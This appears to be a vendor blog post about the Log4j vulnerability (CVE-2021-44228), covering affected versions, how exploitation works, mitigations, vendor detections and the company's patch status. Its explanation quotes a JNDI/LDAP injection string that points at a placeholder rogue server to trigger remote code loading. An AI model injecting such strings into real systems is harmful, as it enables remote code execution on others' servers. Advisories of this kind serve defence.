Last Friday morning NCSC/GovCERT.ch reported that a new Zero-Day vulnerability has been found. CVSS Scored 10 points on criticality in a popular Java library called “Log4j” – a really common logging system used by developers of web and server applications based on Java and other programming languages.

The 0-day was tweeted along with a POC posted on GitHub. It has now been published as CVE-2021-44228.

According to Cisco, the vulnerability affects a broad range of services and applications on servers, making it extremely dangerous—and the latest updates for those server applications urgent.

But the vulnerability is also kind of complex: While certain products may be vulnerable, it doesn’t necessarily mean that the vulnerability can be successfully exploited as this depends on several pre-and post-conditions such as the JVM being used, the actual configuration, etc. Any version of log4j between versions 2.0 and 2.14.1 is affected.

Recording of an Acronis webinar that took place on 16 December 2021 in the wake of widespread attacks enabled by the log4j vulnerability in Java applications and services.

How the exploit works

As the Swiss Government Computer Emergency Response Team mentioned, the vulnerability impacts from how log messages are being handled by the log4j processor. If an attacker sends a specially crafted message (it contains a string like ${jndi:ldap://rogueldapserver.com/a}), this may result in loading an external code class or message lookup and the execution of that code, leading to a situation that is known as Remote Code Execution (RCE).

How to prevent Log4j Zero-Day Exploit according to govcert.ch (graphic)

Mitigations

Make sure that you have permission from the server’s owner for a penetration test. To detect a vulnerable endpoint, trigger a DNS query, using an Open Source web app like CanaryTokens.org.

Limit the vulnerability from future attacks

Focus first on internet-facing services and follow any update instructions. Get an overview of systems and software using log4j in your environment.

SophosLabs has already deployed a number of IPS signatures that scan for traffic attempting to exploit the Log4J vulnerability. The Sophos Managed Threat Response (MTR) team is actively monitoring MTR customer accounts for post-exploit activity. Sophos XDR customers can use a query to help identify vulnerable Log4J components in their environment.

Our DaaS platform has been already patched and our BaaS providers secured. We will continue to follow how Log4J affects the industries.

Leave a Comment

Your email address will not be published.